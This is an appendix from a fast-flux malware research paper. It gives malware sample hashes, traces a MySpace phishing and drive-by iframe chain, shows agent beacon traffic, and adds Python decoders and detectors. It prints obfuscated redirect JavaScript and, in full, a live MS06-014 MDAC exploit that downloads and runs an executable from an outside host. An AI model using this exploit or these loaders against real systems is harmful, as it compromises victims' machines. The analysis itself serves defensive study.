Appendices:
There have been noticeable advancements in the flux agent presented in this document over the past year, including the migration away from arbitrary TCP connections to obtain clear-text instructions, the use of an HTTP library to obtain downloaded instructions, settings and binary updates, and finally the most recent variants that receive control settings via encoded update files. The following examples demonstrate a short historical timeline of just one fast-flux service network malware variant, responsible for all double-flux service networks referenced in this research. It is worth noting that we have observed evidence supporting five distinct fast-flux service nets in operation on the Internet but have not acquired malware samples for all variants to support in-depth study.
Sample: 5cbef2780c8b59977ae598775bad8ecb-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 51200 Bytes
Access: 2007-04-02 22:34:03.000000000 -0400
Modify: 2007-04-02 22:30:36.000000000 -0400
Change: 2007-04-02 22:34:03.000000000 -0400
MD5: 5cbef2780c8b59977ae598775bad8ecb
SHA1: 0925a54ba0366a6406d3222e65b03df0ea8cbc11
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 22:32:27] 5cbef2780c8b59977ae598775bad8ecb - http://xxx.myexes.hk/exes/weby.exe
Sample: 70978572bc5c4fecb9d759611b27a762-weby.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 50176 Bytes
Access: 2007-03-15 02:09:03.000000000 -0400
Modify: 2007-03-09 10:51:26.000000000 -0500
Change: 2007-03-15 02:09:03.000000000 -0400
MD5: 70978572bc5c4fecb9d759611b27a762
SHA1: f8a4d881257dc2f2b2c17ee43f60144e6615994d
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-03-15 02:06:43] 70978572bc5c4fecb9d759611b27a762 - http://xxx.myexes.hk/exes/webdlx/weby.exe
Sample: 5870fd7119a91323dbdf04ebd07d0ac7-plugin_ddos.dll
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 9728 Bytes
Access: 2007-04-02 15:39:05.000000000 -0400
Modify: 2007-03-09 23:48:17.000000000 -0500
Change: 2007-04-02 15:39:06.000000000 -0400
MD5: 5870fd7119a91323dbdf04ebd07d0ac7
SHA1: 4c4d1b3e2030e9a8f3b5c8f152ef9ac7590a96ca
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EDT -0400)
[2007-04-02 15:36:55] 5870fd7119a91323dbdf04ebd07d0ac7 - http://65.111.176.xxx/weby/plugin_ddos.dll
Previous incarnation:
Sample: e903534fab14ee7e00c279d64f578cbb-webyx.exe
File type(s): MS-DOS executable (EXE)
Size: 29557 Bytes
Access: 2007-02-06 15:26:03.000000000 -0500
Modify: 2007-02-02 08:47:24.000000000 -0500
Change: 2007-02-06 15:26:03.000000000 -0500
MD5: e903534fab14ee7e00c279d64f578cbb
SHA1: cf8279c35ec7d8914f3a4ccaaa71e14e7a925b93
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-02-06 15:20:55] e903534fab14ee7e00c279d64f578cbb - http://xxx.myfiles.hk/exes/webyx.exe
Even older sample:
Sample: 88b58b62ae43f0fa42e852874aefbd01-weby.exe
File type(s): MS-DOS executable (EXE)
Size: 29425 Bytes
Access: 2007-01-20 16:29:06.000000000 -0500
Modify: 2007-01-20 05:39:22.000000000 -0500
Change: 2007-01-20 16:29:06.000000000 -0500
MD5: 88b58b62ae43f0fa42e852874aefbd01
SHA1: 6a22e1a06ced848da220301ab85be7a33867bfb5
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2007-01-20 16:26:12] 88b58b62ae43f0fa42e852874aefbd01 - http://xxx.myexes.hk/exes/weby.exe
A prehistoric sample of flux-agent code (according to Internet time). We first observed nodes infected with this malware in the middle of 2006, but only acquired a malware sample for analysis in November 2006:
Sample: d134894005c299c1c01e63d9012a12c6-CD373B130D74F24CA5F8F1ADECA0F6856BC6072A-dnssvc.exe
File type(s): MS-DOS executable (EXE), OS/2 or MS Windows
Size: 11264 Bytes
Access: 2006-11-14 06:39:03.000000000 -0500
Modify: 2006-11-14 06:29:14.000000000 -0500
Change: 2006-11-14 06:39:03.000000000 -0500
MD5: d134894005c299c1c01e63d9012a12c6
SHA1: cd373b130d74f24ca5f8f1adeca0f6856bc6072a
Source(s) of sample: (Timestamps are YYYY-MM-DD hh:mm:ss EST -0500)
[2006-11-14 06:29:44] d134894005c299c1c01e63d9012a12c6 - CD373B130D74F24CA5F8F1ADE
Now that you have a better understanding of the fast-flux technique, the different types, and the malware involved, let's see how the malware distribution process works. This is a real-world example of MySpace drive-by/phish attack vectors propagating fast-flux network growth. In this example we identify two infection vectors:
1. Compromised MySpace Member profiles redirecting to drive-by/phish
2. SWF Flash image malicious redirection to drive-by/phish
We start with profile redirection in MySpace member profiles using iframes. Notice in this example just how many times iframes are called, often simply redirecting to another iframe. Also note the heavy use of obfuscated JavaScript. The attack begins when a connection is made to the domain http://xxx.e4447aa2.com.
<meta http-equiv="refresh" content="1;url="http://xxx.myspace.cfm.fuseaction.splash.mytoken.76701a26.da3e.44a3a17b.e447aa2.com/da3e/index.php"/>
</HEAD>
</HTML>
By following the above /da3e/index.php link, we end up at a credible-looking MySpace landing page (served in flux); its most interesting element is the footer, discussed below:
The iframe renders /.footer_01.gif, which is not an actual GIF file but an encoded/obfuscated JavaScript snippet. Below is the obfuscated JavaScript code it serves.
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41
%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65
%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E
%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28
%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B
%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28
%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D")
);d(unescape("%08<gocpdk-><3?vjekgj\"3?jvfku\" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq\"gocpdk>"));
</SCRIPT>
The decoded result of the above JavaScript is seen below; it is nothing more than another iframe redirecting to a connection with another site.
<iframe src="http://xxx.fafb4c4c.com/header_03.gif"></iframe>
The iframe-rendered /header_03.gif (served in flux) returns another encoded/obfuscated JavaScript file, whose decoded result is:
<iframe src="http://xxx.fafb4c4c.com/routine.php" width=1 height=1></iframe>
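The two-stage obfuscation used by /.footer_01.gif and /header_03.gif is simple enough to reproduce for analysis. The following is an added example, not code from the paper: it undoes the %-escaping of the captured stage-1 decoder, ports the revealed d(s) routine (reverse the string, skip index 0, XOR every character with 2) to Python, and runs it over the captured stage-2 argument. The paper shows its decoded output with the host redacted as xxx; the payload as captured decodes to the bare domain.

```python
import re
from urllib.parse import unquote

# Stage 1 of the footer_01.gif snippet as captured above: the decoder
# function is hidden behind %-escaping and revealed by JavaScript's unescape().
STAGE1_ESCAPED = (
    "%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41"
    "%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65"
    "%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E"
    "%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28"
    "%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B"
    "%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28"
    "%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"
)

# Stage 2: the argument passed to d(). %08 is a backspace character that the
# decoder never reads (its loop stops at i > 0), written here as \x08.
STAGE2_PAYLOAD = (
    '\x08<gocpdk-><3?vjekgj"3?jvfku" dke,12]pgfcgj-oma,a6a6`dcd--8rvvj ?apq"gocpdk>'
)

def reveal_decoder() -> str:
    """Undo the %-escaping; the result is the plain-text body of d(s)."""
    return unquote(STAGE1_ESCAPED)

def decode_stage2(s: str) -> str:
    """Python port of d(s): walk the string backwards from the last character
    down to index 1 (index 0 is never read) and XOR each code unit with 2.
    The 80-character chunking in the original only splits the output into an
    array that is joined back in order, so it does not change the result."""
    return "".join(chr(ord(s[i]) ^ 2) for i in range(len(s) - 1, 0, -1))

def iframe_sources(markup: str) -> list:
    """Pull the src= targets out of decoded markup so the next hop in the
    redirect chain can be logged or blocked."""
    return re.findall(r'<iframe[^>]*\ssrc="([^"]+)"', markup, flags=re.IGNORECASE)

if __name__ == "__main__":
    print(reveal_decoder())
    html = decode_stage2(STAGE2_PAYLOAD)
    print(html)
    print(iframe_sources(html))
```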
Following the iframe-rendered /routine.php file results in yet another encoded/obfuscated JavaScript file. The decoded result of /routine.php is an attempt to exploit vulnerable IE client browsers using the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014), for which Microsoft released a patch in May 2006. Below is the decoded content of the actual attack. Be Careful, This is Live Exploit Code.
If navigator.appName="Microsoft Internet Explorer" Then
If InStr(navigator.platform,"Win32") <> 0 Then
Dim Obj_Name
Dim Obj_Prog
set obj_RDS = document.createElement("object")
obj_RDS.setAttribute "id", "obj_RDS"
obj_RDS.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
fn = "ntmusis32.exe"
Obj_Name = "Shell"
Obj_Prog = "Application"
set obj_ShellApp = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set oFolder = obj_ShellApp.NameSpace(20)
Set oFolderItem=oFolder.ParseName("Symbol.ttf")
Font_Path_Components=Split(oFolderItem.Path,"\",-1,1)
WinDir= Font_Path_Components(0) & "\" & Font_Path_Components(1) & "\"
fn=WinDir & fn
Obj_Name = "Microsoft"
Obj_Prog = "XMLHTTP"
set obj_msxml2 = CreateObject(Obj_Name & "." & Obj_Prog)
obj_msxml2.open "GET","http://xxx.fafb4c4c.com/session.exe",False
obj_msxml2.send
On Error Resume Next
Obj_Name = "ADODB"
Obj_Prog = "Stream"
set obj_adodb = obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
If Err.Number Then
Obj_Name = "Scripting"
Obj_Prog = "FileSystemObject"
Set obj_FileSys=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
Set download_file=obj_FileSys.CreateTextFile(fn, TRUE)
download_file_size=LenB(XMLBody)
For i=1 To download_file_size
cByte=MidB(XMLBody,i,1)
ByteCode=AscB(cByte)
download_file.Write(Chr(ByteCode))
Next
download_file.Close
Obj_Name = "WScript"
Obj_Prog = "Shell"
Set obj_WShell=obj_RDS.CreateObject(Obj_Name & "." & Obj_Prog,"")
On Error Resume Next
obj_WShell.Run fn,1,FALSE
Else
obj_adodb.Type=1
obj_adodb.Open
obj_adodb.Write(obj_msxml2.responseBody)
obj_adodb.SaveToFile fn,2
obj_ShellApp.ShellExecute fn
End If
End If
End If
</SCRIPT>
The successful compromise of a Windows host via this exploit content results in the download of a malicious downloader stub executable, session.exe, which is then responsible for attempting to download the additional malicious components needed to integrate the newly compromised host into a fast-flux service network. The session.exe sample above attempts to download and execute the following components:
http://xxx.myfiles.hk/exes/webdl3x/weby.exe
http://xxx.myfiles.hk/exes/webdl3x/oly.exe
http://xxx.camgenie.com/weby7.exe
Supporting Detail:
Following is a representative sampling of URLs to imageshack.us-hosted Flash files that perform one simple action: an ActionScript-based browser redirect to a flux-hosted combination phishing/drive-by exploit that leverages the Internet Explorer (MDAC) Remote Code Execution Exploit (MS06-014). All of the files are identical, as shown by the same MD5 and SHA1 hashes:
MD5: 6eaf6eed47fb52a6a87da8c829c7f8a0
SHA1: dc60b0fedf54eaf055c64ae6d434b8fc18252740
The modification time maintained by the ImageShack HTTP server suggests an SWF compile time of 2007-06-05 03:56:30 -0700. Decompiling the Flash component results in:
$ swfdump -atp ./xxx.imageshack.us/img527/3530/38023350se6.swf
[HEADER] File version: 8
[HEADER] File size: 98
[HEADER] Frame rate: 120.000000
[HEADER] Frame count: 1
[HEADER] Movie width: 1.00
[HEADER] Movie height: 1.00
[045] 4 FILEATTRIBUTES
[009] 3 SETBACKGROUNDCOLOR (ff/ff/ff)
[018] 31 PROTECT
[00c] 28 DOACTION
( 24 bytes) action: GetUrl URL:"http://xxx.e447aa2.com" Label:""
( 0 bytes) action: End
[001] 0 SHOWFRAME 1 (00:00:00,000)
[000] 0 END
Below are a few examples of URLs that host the same flash files:
The following are examples of flux-serviced MySpace phish/drive-by domains referenced from presumably compromised MySpace user accounts, observed during the same time period, between 2007-06-26 17:35:44 and 23:18:00 (EDT -0400).
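The naming trick in these hosts, and in the splash redirect earlier (myspace.cfm.fuseaction.splash.mytoken...e447aa2.com), is to stack a trusted brand's labels in front of an unrelated registrable domain. The following is an added example, not from the paper, of a check a proxy or DNS log reviewer could run for that shape; the watch list, the two-label registrable-domain rule and the sample hostnames are constructed assumptions for this example.

```python
from dataclasses import dataclass
from typing import Optional

# Brand label -> the registrable domain it legitimately belongs to.
# Constructed watch list for this example.
WATCHED_BRANDS = {"myspace": "myspace.com"}

@dataclass
class Verdict:
    host: str
    registrable_domain: str
    impersonates: Optional[str]   # brand domain being mimicked, if any
    label_depth: int              # flux phish hosts are unusually deep

def inspect_host(host: str) -> Verdict:
    """Flag a host whose subdomain labels contain a watched brand while its
    registrable domain is something else, the shape of
    myspace.com.index.cfm.fuseaction.user.mytoken.<token>.<random>.com
    Registrable domain is simplified to the last two labels, adequate for the
    .com hosts seen here; production code would use the Public Suffix List."""
    labels = host.lower().rstrip(".").split(".")
    reg = ".".join(labels[-2:])
    impersonates = None
    for label in labels[:-2]:                # subdomain labels only
        brand_domain = WATCHED_BRANDS.get(label)
        if brand_domain and brand_domain != reg:
            impersonates = brand_domain
            break
    return Verdict(host, reg, impersonates, len(labels))

def is_suspicious(host: str) -> bool:
    return inspect_host(host).impersonates is not None

# Constructed sample hostnames shaped like the observations above; the
# tokens and registrable domains are made up, not values from the paper.
SAMPLE_HOSTS = [
    "myspace.com.index.cfm.fuseaction.user.mytoken.q1w2e3r4.fluxdom01.com",
    "www.myspace.cfm.fuseaction.splash.mytoken.a1b2c3d4.fluxdom02.com",
    "profile.myspace.com",
    "www.example.com",
]

if __name__ == "__main__":
    for h in SAMPLE_HOSTS:
        v = inspect_host(h)
        tag = "SUSPECT" if v.impersonates else "ok"
        print(f"{tag:7} depth={v.label_depth:2} {h} -> {v.registrable_domain}")
```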
In our fast-flux case study, this is where our infected flux agent makes an initial contact (phone home) connection to a remote web server to report to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache
GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8
Added Successfully!
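The check-in above is a useful detection anchor: a fixed path with a small set of query fields, a User-Agent that is the bare token MSIE 7.0 rather than the Mozilla/4.0 (compatible; MSIE 7.0; ...) string a real browser sends, and an uptime built from a garbage counter. The following is an added example, not from the paper, that parses the captured request and reports those indicators; the benign request and the 6-digit uptime threshold are constructed assumptions.

```python
from urllib.parse import urlsplit, parse_qs

# The phone-home request as captured above (host redacted by the paper).
BEACON = (
    "GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1"
    "&version=2.0&build=beta004&uptime=244813135872w%20244813135872d"
    "%20244813135892h%20244813135919m%20244813135929s HTTP/1.1\r\n"
    "User-Agent: MSIE 7.0\r\n"
    "Host: xxx.ifeelyou.info\r\n"
    "Cache-Control: no-cache\r\n\r\n"
)

# Constructed ordinary browser request for comparison.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n"
    "Host: www.example.com\r\n\r\n"
)

def parse_request(raw: str) -> dict:
    """Split an HTTP/1.x request into method, path, query dict and headers."""
    head, _, _ = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": parts.path,
            "query": {k: v[0] for k, v in parse_qs(parts.query).items()},
            "headers": headers}

def beacon_indicators(req: dict) -> list:
    """Return the reasons a parsed request looks like this flux-agent check-in."""
    hits = []
    q, ua = req["query"], req["headers"].get("user-agent", "")
    if req["path"].endswith("/remote.php") and {"os", "user", "status", "build"}.issubset(q):
        hits.append("remote.php check-in carrying os/user/status/build fields")
    # Real IE identifies as 'Mozilla/4.0 (compatible; MSIE 7.0; ...)'; a bare token is a custom client.
    if ua.startswith("MSIE") and not ua.startswith("Mozilla/"):
        hits.append("bare 'MSIE' User-Agent without Mozilla/ prefix")
    # Each uptime field is a 12-digit count; anything beyond 6 digits is not a real uptime (assumed threshold).
    uptime = q.get("uptime", "")
    if any(len(tok.rstrip("wdhms")) > 6 for tok in uptime.split(" ")):
        hits.append("implausible uptime field")
    return hits

if __name__ == "__main__":
    for raw in (BEACON, BENIGN):
        print(beacon_indicators(parse_request(raw)))
```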
In our fast-flux case study, this is the server response to a request from the fast-flux agent for the configuration file settings.ini on the remote web server. This appears to be a consistent 197-byte binary/encoded configuration response. We are still attempting to complete the reverse engineering of this session:
In our fast-flux case study, the system downloads a suspiciously named DLL, plugin_ddos.dll, whose name might suggest to some that it is a denial-of-service component.